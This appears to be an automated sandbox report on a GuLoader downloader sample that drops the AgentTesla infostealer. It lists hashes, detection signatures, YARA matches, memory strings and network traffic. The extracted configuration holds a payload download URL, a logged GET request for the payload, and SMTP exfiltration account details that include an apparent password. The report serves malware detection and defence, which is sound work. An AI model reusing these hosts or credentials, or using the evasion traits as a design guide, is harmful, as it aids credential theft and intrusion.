Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
Analysis ID:	635379
MD5:	e2e4196b84fdf8956baa7f99b11812af
SHA1:	7af0382928364f2fc088d13f96394f4d83bd01ae
SHA256:	7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin"}
Source: conhost.exe.4512.4.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fugen.ozkunt@paralikgroup.comFug1966Ozkmail.paralikgroup.comsaleseuropower2@yandex.com"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Virustotal: Detection: 21%

Perma Link

Uses 32bit PE files

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0040699E FindFirstFileW,FindClose,	1_2_0040699E

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: artist151sh.comCache-Control: no-cache

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.11.20:49777 -> 173.254.28.216:587

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.11.20:49777 -> 173.254.28.216:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000003.00000002.42052443379.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ckatRU.com
Source: user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#Attribution
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#Distribution
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#Notice
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#Reproduction
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr	String found in binary or memory: http://creativecommons.org/ns#ShareAlike
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.paralikgroup.com
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, Toelike.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://8tHZzAc0TjNm.org
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://8tHZzAc0TjNm.orgt-Wl
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://8tHZzAc0TjNm.orgx
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: artist151sh.com

Source: global traffic

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405809

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Uses 32bit PE files

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403640

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_00406D5F	1_2_00406D5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_713D1BFF	1_2_713D1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325E349	1_2_0325E349
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325CC31	1_2_0325CC31
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258525	1_2_03258525
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258720	1_2_03258720
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251707	1_2_03251707
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251706	1_2_03251706
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325671C	1_2_0325671C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258F60	1_2_03258F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325657D	1_2_0325657D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325657F	1_2_0325657F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03255340	1_2_03255340
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325174E	1_2_0325174E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251950	1_2_03251950
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258550	1_2_03258550
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03252D5D	1_2_03252D5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325EF5D	1_2_0325EF5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032517AE	1_2_032517AE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03256780	1_2_03256780
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325878F	1_2_0325878F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032603E2	1_2_032603E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032553F6	1_2_032553F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032585FB	1_2_032585FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258FC0	1_2_03258FC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251827	1_2_03251827
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325DE21	1_2_0325DE21
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251A05	1_2_03251A05
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03255004	1_2_03255004
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03255214	1_2_03255214
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325501C	1_2_0325501C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251A7E	1_2_03251A7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258844	1_2_03258844
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03259056	1_2_03259056
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325585B	1_2_0325585B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032552A0	1_2_032552A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032550AC	1_2_032550AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03255487	1_2_03255487
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03256682	1_2_03256682
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325868C	1_2_0325868C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03251892	1_2_03251892
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258CE4	1_2_03258CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032554E7	1_2_032554E7
